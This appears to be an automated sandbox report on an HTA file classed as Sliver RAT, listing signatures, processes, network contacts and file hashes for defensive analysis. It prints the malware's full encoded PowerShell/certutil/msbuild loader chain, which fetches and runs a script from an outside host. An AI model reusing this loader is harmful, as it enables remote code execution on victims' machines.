Analysis Overview
SHA256
3a4befeda808fff4c4bef7d488d59fefa1334d9c7acb6cb155c6cfa9f88a03f3
Threat Level: Known bad
The file update.hta was found to be: Known bad.
Malicious Activity Summary
SliverRAT
Sliver RAT v2
Sliver family
Command and Scripting Interpreter: PowerShell
Manipulates Digital Signatures
Checks computer location settings
Deobfuscate/Decode Files or Information
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Modifies Internet Explorer settings
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-06 08:02
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-06 08:02
Reported
2024-11-06 08:04
Platform
win7-20240903-en
Max time kernel
119s
Max time network
150s
Command Line
Signatures
Sliver RAT v2
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sliver family
SliverRAT
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Deobfuscate/Decode Files or Information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\certutil.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\certutil.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\update.hta"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden echo PFByb2plY3QgVG9vbHNWZXJzaW9uPSI0LjAiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL2RldmVsb3Blci9tc2J1aWxkLzIwMDMiPg0KICA8IS0tIFRoaXMgaW5saW5lIHRhc2sgZXhlY3V0ZXMgYyMgY29kZS4gLS0+DQogIDwhLS0gQzpcV2luZG93c1xNaWNyb3NvZnQuTkVUXEZyYW1ld29yazY0XHY0LjAuMzAzMTlcbXNidWlsZC5leGUgcHNoZWxsLnhtbCAtLT4NCiAgIDwhLS0gQXV0aG9yOiBDYXNleSBTbWl0aCwgVHdpdHRlcjogQHN1YlRlZSAtLT4NCiAgPCEtLSBMaWNlbnNlOiBCU0QgMy1DbGF1c2UgLS0+DQogIDxUYXJnZXQgTmFtZT0iSGVsbG8iPg0KICAgPEZyYWdtZW50RXhhbXBsZSAvPg0KICAgPENsYXNzRXhhbXBsZSAvPg0KICA8L1RhcmdldD4NCiAgPFVzaW5nVGFzaw0KICAgIFRhc2tOYW1lPSJGcmFnbWVudEV4YW1wbGUiDQogICAgVGFza0ZhY3Rvcnk9IkNvZGVUYXNrRmFjdG9yeSINCiAgICBBc3NlbWJseUZpbGU9IkM6XFdpbmRvd3NcTWljcm9zb2Z0Lk5ldFxGcmFtZXdvcmtcdjQuMC4zMDMxOVxNaWNyb3NvZnQuQnVpbGQuVGFza3MudjQuMC5kbGwiID4NCiAgICA8UGFyYW1ldGVyR3JvdXAvPg0KICAgIDxUYXNrPg0KICAgICAgPFVzaW5nIE5hbWVzcGFjZT0iU3lzdGVtIiAvPg0KICAgICAgPFVzaW5nIE5hbWVzcGFjZT0iU3lzdGVtLklPIiAvPg0KICAgICAgPENvZGUgVHlwZT0iRnJhZ21lbnQiIExhbmd1YWdlPSJjcyI+DQogICAgICAgIDwhW0NEQVRBWw0KICAgICAgICAgICAgICAgIENvbnNvbGUuV3JpdGVMaW5lKCJIZWxsbyBGcm9tIEZyYWdtZW50Iik7DQogICAgICAgIF1dPg0KICAgICAgPC9Db2RlPg0KICAgIDwvVGFzaz4NCiAgICA8L1VzaW5nVGFzaz4NCiAgICA8VXNpbmdUYXNrDQogICAgVGFza05hbWU9IkNsYXNzRXhhbXBsZSINCiAgICBUYXNrRmFjdG9yeT0iQ29kZVRhc2tGYWN0b3J5Ig0KICAgIEFzc2VtYmx5RmlsZT0iQzpcV2luZG93c1xNaWNyb3NvZnQuTmV0XEZyYW1ld29ya1x2NC4wLjMwMzE5XE1pY3Jvc29mdC5CdWlsZC5UYXNrcy52NC4wLmRsbCIgPg0KICAgIDxUYXNrPg0KICAgICAgPFJlZmVyZW5jZSBJbmNsdWRlPSJTeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uIiAvPg0KICAgICAgPENvZGUgVHlwZT0iQ2xhc3MiIExhbmd1YWdlPSJjcyI+DQogICAgICAgIDwhW0NEQVRBWw0KICAgICAgICANCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbTsNCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5JTzsNCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5EaWFnbm9zdGljczsNCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5SZWZsZWN0aW9uOw0KICAgICAgICAgICAgdXNpbmcgU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzOw0KICAgICAgICAgICAgLy9BZGQgRm9yIFBvd2VyU2hlbGwgSW52b2NhdGlvbg0KICAgICAgICAgICAgdXNpbmcgU3lzdGVtLkNvbGxlY3Rpb25zLk9iamVjdE1vZGVsOw0KICAgICAgICAgICAgdXNpbmcgU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbjsNCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uUnVuc3BhY2VzOw0KICAgICAgICAgICAgdXNpbmcgU3lzdGVtLlRleHQ7DQogICAgICAgICAgICB1c2luZyBNaWNyb3NvZnQuQnVpbGQuRnJhbWV3b3JrOw0KICAgICAgICAgICAgdXNpbmcgTWljcm9zb2Z0LkJ1aWxkLlV0aWxpdGllczsNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIHB1YmxpYyBjbGFzcyBDbGFzc0V4YW1wbGUgOiAgVGFzaywgSVRhc2sNCiAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICBwdWJsaWMgb3ZlcnJpZGUgYm9vbCBFeGVjdXRlKCkNCiAgICAgICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgICAgIFN0cmluZyBjbWQgPSBAIihOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vc2VjdXJlLmNsb3VkdGVjaG5vbG9naWVzdXNhLmNvbTo4MDgxL3VwZGF0ZS50eHQnKSB8IGlleCI7DQogICAgICAgICAgICBSdW5zcGFjZSBycyA9IFJ1bnNwYWNlRmFjdG9yeS5DcmVhdGVSdW5zcGFjZSgpOw0KICAgICAgICAgICAgcnMuT3BlbigpOw0KICAgICAgICAgICAgUG93ZXJTaGVsbCBwcyA9IFBvd2VyU2hlbGwuQ3JlYXRlKCk7DQogICAgICAgICAgICBwcy5SdW5zcGFjZSA9IHJzOw0KICAgICAgICAgICAgcHMuQWRkU2NyaXB0KGNtZCk7DQogICAgICAgICAgICBwcy5JbnZva2UoKTsNCiAgICAgICAgICAgIHJzLkNsb3NlKCk7DQogICAgICAgICAgICByZXR1cm4gdHJ1ZTsNCiAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgfQ0KICAgICAgICAgICAgDQogICAgICAgICAgICANCiANCiAgICAgICAgICAgIA0KICAgICAgICBdXT4NCiAgICAgIDwvQ29kZT4NCiAgICA8L1Rhc2s+DQogIDwvVXNpbmdUYXNrPg0KPC9Qcm9qZWN0Pg== > c:\windows\temp\enc3.txt;certutil -decode c:\windows\temp\enc3.txt c:\windows\temp\d.xml;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\windows\temp\d.xml
C:\Windows\SysWOW64\certutil.exe
"C:\Windows\system32\certutil.exe" -decode c:\windows\temp\enc3.txt c:\windows\temp\d.xml
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe" C:\windows\temp\d.xml
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zqq5taop\zqq5taop.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8160.tmp" "c:\Users\Admin\AppData\Local\Temp\zqq5taop\CSCB5867AA7C1E84774AC7D35E9A182F1E.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rwmar3kj\rwmar3kj.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES82E6.tmp" "c:\Users\Admin\AppData\Local\Temp\rwmar3kj\CSCD42C67D7874B42EFB935A3AD2D5AF740.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5ngk1bbo\5ngk1bbo.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9379.tmp" "c:\Users\Admin\AppData\Local\Temp\5ngk1bbo\CSC5080321A549240BB88B441DC970A18B.TMP"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | secure.cloudtechnologiesusa.com | udp |
| US | 23.239.28.166:8081 | secure.cloudtechnologiesusa.com | tcp |
| US | 23.239.28.166:8080 | secure.cloudtechnologiesusa.com | tcp |
| US | 23.239.28.166:443 | secure.cloudtechnologiesusa.com | tcp |
| US | 23.239.28.166:443 | secure.cloudtechnologiesusa.com | tcp |
Files
\??\c:\windows\temp\enc3.txt
| MD5 | 940ed0fa0b1fc8ed6fbf279ab67af56f |
| SHA1 | da4b7c40029542659f025ae74fa0be0fb0fa473c |
| SHA256 | 731673720695df22b838e0d256f7506eaa4c7570601db0a409302ab3a0cd1686 |
| SHA512 | 934e3c5ee3b225ab0d686310a435865880b6c59f4885bb93cca814e8354456de3231364d3aa5cb6bc3c4472e6e6539da719c2b214e998e9e5773cca02f7d14ae |
memory/3036-5-0x000000013F560000-0x000000013F59E000-memory.dmp
memory/3036-6-0x0000000000750000-0x000000000076A000-memory.dmp
memory/3036-7-0x000000001B8E0000-0x000000001BA3A000-memory.dmp
C:\windows\temp\d.xml
| MD5 | 6c2a8d820d8d80182aacdc125399cd71 |
| SHA1 | 51ccd1e0c3247bf24da813a1f660a367f8deefc8 |
| SHA256 | 104291eb54874a1e80375b91ec552efac6632272654c8a5613730bd2eba9e78a |
| SHA512 | c7c825a9b237850f6d087a449baaeed4e671db91b3db078586e322e992cb26efdb24d0ff8b365291ff58c3786dc563a62c4cbdcb81cecd95027606ef6fffd8c3 |
memory/3036-9-0x000000001D080000-0x000000001D1A2000-memory.dmp
memory/3036-10-0x000000001D1B0000-0x000000001D2D2000-memory.dmp
memory/3036-11-0x00000000009E0000-0x0000000000A24000-memory.dmp
memory/3036-12-0x0000000002340000-0x0000000002384000-memory.dmp
memory/3036-13-0x0000000002280000-0x000000000229A000-memory.dmp
memory/3036-14-0x000000001D2E0000-0x000000001D45A000-memory.dmp
memory/3036-15-0x000000001D2E0000-0x000000001D644000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\zqq5taop\zqq5taop.cmdline
| MD5 | 881b1f81ea1f01a00da830ecdfc13f78 |
| SHA1 | 3fa10ca9d104c51d958e265e8c8a09d2e3307aaa |
| SHA256 | 5a0773e5a53f483d7767040536e5bbaf4dee3909ea0eecfdcb8a8af7dcf5e3e6 |
| SHA512 | 4d0dd301c291bfeb8086e41501fa5d100bf6c7ea4e3439aebd1dd273eb67944b91edffe487bbaeb3451e1f17c2dd431e3f3e0d3f162f14e6a9a2a382af7210cb |
\??\c:\Users\Admin\AppData\Local\Temp\zqq5taop\zqq5taop.0.cs
| MD5 | 4a4ff4a5e71cabe4864c862a697c1e27 |
| SHA1 | b95fb7438213c3ae9caf0e8b52bb301fefcddb56 |
| SHA256 | 70e3eb02311312b3f1ff90617cb47ebb9b8e7cab47771668811a34584182c6bb |
| SHA512 | 7c9257e5f23e2c378f47cb3bdced440d07bf96575a10883e59e0a0b4d8834b0ab3a43e4b850f48e2538021d2b352d732fc93f81277bcc20c45b070dc56bdcff5 |
\??\c:\Users\Admin\AppData\Local\Temp\zqq5taop\CSCB5867AA7C1E84774AC7D35E9A182F1E.TMP
| MD5 | 2374710b880ac2161dc769313a1b7531 |
| SHA1 | dbec081ecb1f1d210bcfb732a98292b61864aade |
| SHA256 | 5a03a91eb4425e2c58aedab6b96d4721b46f7d9abdfaf360b67300db8b505f6a |
| SHA512 | fa2965749ebbf4c55df6df098d229a71331b952bf290769fdc95a452c09ce55a82ed186b90e29b853a6f1ddf33da2a78ca67c4b44064e5015df4885771385917 |
C:\Users\Admin\AppData\Local\Temp\RES8160.tmp
| MD5 | fd007fb85400326c46a7b49fa38c768b |
| SHA1 | 919d56ecc9154aacd7321ae7923710bec2b883bc |
| SHA256 | 3ac58b6eb7a8c056c5061f87fca2246c4333ae4a6c8d0c66551842ad2c5f3eb8 |
| SHA512 | 89bf453adbd23600b381ad066a731ee53531ac3258dca31e2bd72a23e081c60e01abf24f7383e9f95f66439f0eb9d8668e5223f50fd96f3c57a8c16f3a5845f8 |
C:\Users\Admin\AppData\Local\Temp\zqq5taop\zqq5taop.pdb
| MD5 | 8480140a79ba78d79762563815938592 |
| SHA1 | f3f392ea36ead4199725b2ae0c00c24da0902a92 |
| SHA256 | 9fe6e902e7f1aa11669ab894aba17bd2a9b48438577d998d5cd940aa72c124c8 |
| SHA512 | 4ef456df077eca809ac84f8bb1a9bce2f1a8cd5df8ae23cce443faf72235db9b5dffee62fc79fa4493640a1394babed7bf3e1f3db7dd02df47e426f98c7b5fc1 |
C:\Users\Admin\AppData\Local\Temp\zqq5taop\zqq5taop.dll
| MD5 | 11d6296450c898f18c22cae4cd48a865 |
| SHA1 | b182389b7fdebde94316fb40b5eeeaa47fc1994c |
| SHA256 | 7c17ef61af67c1bee9a2ad71ea056934e240926cfcaf26fdf151656b6228db82 |
| SHA512 | b3762230257ab46089b3703b78f9a0f2dcc057f16a30f2adaf1c860263fdb82c21ad816c1c3853b387ea837842bebd46aba315efeaf036258fa199cf603c6e3e |
memory/3036-30-0x0000000000A30000-0x0000000000A38000-memory.dmp
memory/3036-32-0x000000001D080000-0x000000001D1A2000-memory.dmp
memory/3036-33-0x000000001E2C0000-0x000000001E5A2000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\rwmar3kj\rwmar3kj.cmdline
| MD5 | 67fe714bc79cf7d0fc1273fde2f3c1de |
| SHA1 | fadfc2776bc4b2c76da22fe146c6fb1d8a35beb5 |
| SHA256 | 592dd2ed82d0b33afdaa3a84226deecb1569b4909a6e407c368ee9713b37052b |
| SHA512 | ee645f9c94e921d4a12256eea641a6ceb33bcd94d23b3cb29abfa01ddfc68e9d25ac1e38c39e6e54889abded951cebb8b2b2077b1eca299cdb846e43bd8898ea |
\??\c:\Users\Admin\AppData\Local\Temp\rwmar3kj\rwmar3kj.0.cs
| MD5 | da1f4b7b1a87cc475dfa05923b6301a0 |
| SHA1 | 0e2ff764c519bc8169b66437857f01e25676e343 |
| SHA256 | 624fe16b05ade5d9929c6ecf16857939230ea32156405c18b4dacfb0448e310e |
| SHA512 | d09603fd0e641122cc99ccf6c53bb93db7df2b52ed1cdd44d3e73d963a3e9fd12eb1918477c043ba39e2ae123071f2df98b9180eb2a533c01bbdbaab2563b53b |
C:\Users\Admin\AppData\Local\Temp\rwmar3kj\rwmar3kj.pdb
| MD5 | 1083cd943f22be2aa9af6cfe1118b4d3 |
| SHA1 | d481cdec819112b11043d894401bd2b72d65919a |
| SHA256 | c79c0d68e9fe5477bfd3d63784449d70c917ebc523a667b8665536460c50b50d |
| SHA512 | d199a2e0138fd435169b6329c9a571c8b96a5ee33266dafef42e49d25c78775eb4d69ead99d3cf219bc00828f98fd2561ad9842e538127266d57cba33e082a0c |
C:\Users\Admin\AppData\Local\Temp\rwmar3kj\rwmar3kj.dll
| MD5 | 2e6b5b5dc995f04a454ef8063876320c |
| SHA1 | 86712136c7a46638c44b1983d10633687cf7cc75 |
| SHA256 | 4c9c065e4a3001abbd5aac79a7282184831a50f05085c6f297d95032bac7ce82 |
| SHA512 | aa5abda1eba6edccdc42f035cc3979d383401adf872061a21294f23bc04e06d681dc0a5fa2c0871e9a8a9b9d3890dc2df60a7be41ee17526b41752cf83bf6859 |
C:\Users\Admin\AppData\Local\Temp\RES82E6.tmp
| MD5 | 72bd236616923bf71d332fe03f1d40ea |
| SHA1 | 3c14f26383362e3ad0fa2a2932a31929435a5dcf |
| SHA256 | 399b8bcb4db41612a061749614a041418d772ad0fefb95d534117fc9d3de73e5 |
| SHA512 | b8c44919149664583e9c144553e65cd0c6bb14fe8d739769d5fa0545ea120542723bc5add60d3d26c5acce38359d48683f698442a5b1818eeba5e7c4ca4067e8 |
\??\c:\Users\Admin\AppData\Local\Temp\rwmar3kj\CSCD42C67D7874B42EFB935A3AD2D5AF740.TMP
| MD5 | 71c96137efea33c794dfe536108af907 |
| SHA1 | be8f216439809de4bf9bfbc778bb193d1caec714 |
| SHA256 | 28216bf9c89377f2cef780bce260437baf8ef62fca76ad5bc397aff622c21f73 |
| SHA512 | 2ee9edc4ef3284de0e221862d0fe73a83a30b0f15710df126b7cdf6bb9bddffde035fb73d66e6b1f3ec919820d444d9575bb343b4e0b7f57a1d8b2050d37ccb5 |
memory/3036-48-0x0000000002280000-0x0000000002288000-memory.dmp
memory/3036-50-0x0000000002290000-0x00000000022AC000-memory.dmp
memory/3036-51-0x0000000002340000-0x0000000002388000-memory.dmp
memory/3036-52-0x00000000022B0000-0x00000000022B8000-memory.dmp
memory/3036-53-0x000000001BD70000-0x000000001BE16000-memory.dmp
memory/3036-54-0x0000000002390000-0x00000000023C4000-memory.dmp
memory/3036-55-0x00000000023D0000-0x000000000241A000-memory.dmp
memory/3036-56-0x00000000024A0000-0x00000000024B6000-memory.dmp
memory/3036-57-0x000000001D080000-0x000000001D1A2000-memory.dmp
memory/3036-58-0x000000001D080000-0x000000001D13A000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\5ngk1bbo\5ngk1bbo.0.cs
| MD5 | 9dc0e32c32d7b3cfd2f819d8c0e4c7a5 |
| SHA1 | 267cb8f96e02e298033786efd8ee6d87a73418a3 |
| SHA256 | 67bc3e11493360528ba1296980ab818bf4c3938d14ddd6b5063bba03667b28ac |
| SHA512 | c41e6c862933bed65c892b6cc89765a63ae936bdcb7a0499e0b1bd57d2a1d710dd66acb58fa7a7ffbef8a339fe647ccae85f6fdac3e7e7657472576a979a14b0 |
\??\c:\Users\Admin\AppData\Local\Temp\5ngk1bbo\5ngk1bbo.cmdline
| MD5 | a85bd98eb3d96a05e0581717dd4eff42 |
| SHA1 | 2c802c9374ab45518a61b6bc4681c7b7d79e06d3 |
| SHA256 | e623afbca12171675154c4cc8e2dbfccf7a44f583f6d69b5650ba1a48cf21c22 |
| SHA512 | 45992384738b71a3761dbfae78f46f8626740a49d0246b3264dcef7c2793514be6d61ed630066994542bdf5a93d9279019c6e7329a746e491f9d679d80e34889 |
\??\c:\Users\Admin\AppData\Local\Temp\5ngk1bbo\CSC5080321A549240BB88B441DC970A18B.TMP
| MD5 | 2570c0361e73fa666b4d735c0c1424e9 |
| SHA1 | 98f7438113244b528dd7dc76d60074fd4ae0b8c0 |
| SHA256 | 87be4fecdb0b228ff90f79724416d52e5598609cb84e3566c50cf8db012fb78e |
| SHA512 | 8633e3383f46970f7d5765f6158c1480080c86f429c13a3cb5cc8decdbef10037181a58a78f519d16991869073738791519ac15aaec0bfcdfcfae84af4f3d5f6 |
C:\Users\Admin\AppData\Local\Temp\5ngk1bbo\5ngk1bbo.dll
| MD5 | 080e79bbe7d6054b07aff355114a5886 |
| SHA1 | b34637025a61a91234efd1c8167c7bd6ac602e9e |
| SHA256 | 5bff50b3e2a7b782e2ac5e31484b1dbfd2b5bf75404a9f126bfff5e32d3f10fc |
| SHA512 | 93d2f0eb37ca2771ea414f7d47a961d4c9fd73ccaab2262c1ac190701288069a5677c2d17ca55be435047aa7170245da871898bc4970eb60e67aa9554af4e68e |
C:\Users\Admin\AppData\Local\Temp\5ngk1bbo\5ngk1bbo.pdb
| MD5 | 243f88f3e6f1a5caf3994d914fda7e33 |
| SHA1 | 1bbf22015ca12d0fac58c30980b9c70799ad1c72 |
| SHA256 | 9703bff9e9ac0ae72555eb6233d96b2a1433ff7de42651218544c82b59e1e536 |
| SHA512 | 772f4dba8649efb886304986c90dcc130fe0858698e03307fc3e15dfd4406482b4fa5f1beaead7207906a442c2a2e7696544974c66b24c1fdb471528c4bdc170 |
C:\Users\Admin\AppData\Local\Temp\RES9379.tmp
| MD5 | 76fd7713a8c3c9c2cdcfb6b25b2382e2 |
| SHA1 | be336fefbe4f065b27ace3597f4033db26534d79 |
| SHA256 | a48d124680ebb6c2712a3e21551d6c8167874c93a92a166d15fc9eaf35d1ca02 |
| SHA512 | 1c5c7b0800635ae384f18a8150d8e8fdd21e2a8fb4bfc76994f07986d530c04afc815dbccee523bd13e3abc3aba6c6f3cdbe5557f8e947809bcbee5773e2b904 |
memory/3036-73-0x00000000024C0000-0x00000000024C8000-memory.dmp
memory/3036-75-0x0000000020680000-0x00000000210FB000-memory.dmp
memory/3036-78-0x0000000022160000-0x0000000022C44000-memory.dmp
memory/3036-77-0x0000000022160000-0x0000000022C44000-memory.dmp
memory/3036-79-0x0000000022160000-0x0000000022C44000-memory.dmp
memory/3036-80-0x0000000022160000-0x0000000022C44000-memory.dmp
memory/3036-76-0x0000000022160000-0x0000000022C44000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-06 08:02
Reported
2024-11-06 08:04
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
Sliver RAT v2
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sliver family
SliverRAT
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Manipulates Digital Signatures
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.3!7\Name = "szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL" | C:\Windows\SysWOW64\certutil.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.1!7\Name = "szOID_ROOT_PROGRAM_AUTO_UPDATE_CA_REVOCATION" | C:\Windows\SysWOW64\certutil.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.2!7\Name = "szOID_ROOT_PROGRAM_AUTO_UPDATE_END_REVOCATION" | C:\Windows\SysWOW64\certutil.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
Deobfuscate/Decode Files or Information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\certutil.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\certutil.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\update.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden echo PFByb2plY3QgVG9vbHNWZXJzaW9uPSI0LjAiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL2RldmVsb3Blci9tc2J1aWxkLzIwMDMiPg0KICA8IS0tIFRoaXMgaW5saW5lIHRhc2sgZXhlY3V0ZXMgYyMgY29kZS4gLS0+DQogIDwhLS0gQzpcV2luZG93c1xNaWNyb3NvZnQuTkVUXEZyYW1ld29yazY0XHY0LjAuMzAzMTlcbXNidWlsZC5leGUgcHNoZWxsLnhtbCAtLT4NCiAgIDwhLS0gQXV0aG9yOiBDYXNleSBTbWl0aCwgVHdpdHRlcjogQHN1YlRlZSAtLT4NCiAgPCEtLSBMaWNlbnNlOiBCU0QgMy1DbGF1c2UgLS0+DQogIDxUYXJnZXQgTmFtZT0iSGVsbG8iPg0KICAgPEZyYWdtZW50RXhhbXBsZSAvPg0KICAgPENsYXNzRXhhbXBsZSAvPg0KICA8L1RhcmdldD4NCiAgPFVzaW5nVGFzaw0KICAgIFRhc2tOYW1lPSJGcmFnbWVudEV4YW1wbGUiDQogICAgVGFza0ZhY3Rvcnk9IkNvZGVUYXNrRmFjdG9yeSINCiAgICBBc3NlbWJseUZpbGU9IkM6XFdpbmRvd3NcTWljcm9zb2Z0Lk5ldFxGcmFtZXdvcmtcdjQuMC4zMDMxOVxNaWNyb3NvZnQuQnVpbGQuVGFza3MudjQuMC5kbGwiID4NCiAgICA8UGFyYW1ldGVyR3JvdXAvPg0KICAgIDxUYXNrPg0KICAgICAgPFVzaW5nIE5hbWVzcGFjZT0iU3lzdGVtIiAvPg0KICAgICAgPFVzaW5nIE5hbWVzcGFjZT0iU3lzdGVtLklPIiAvPg0KICAgICAgPENvZGUgVHlwZT0iRnJhZ21lbnQiIExhbmd1YWdlPSJjcyI+DQogICAgICAgIDwhW0NEQVRBWw0KICAgICAgICAgICAgICAgIENvbnNvbGUuV3JpdGVMaW5lKC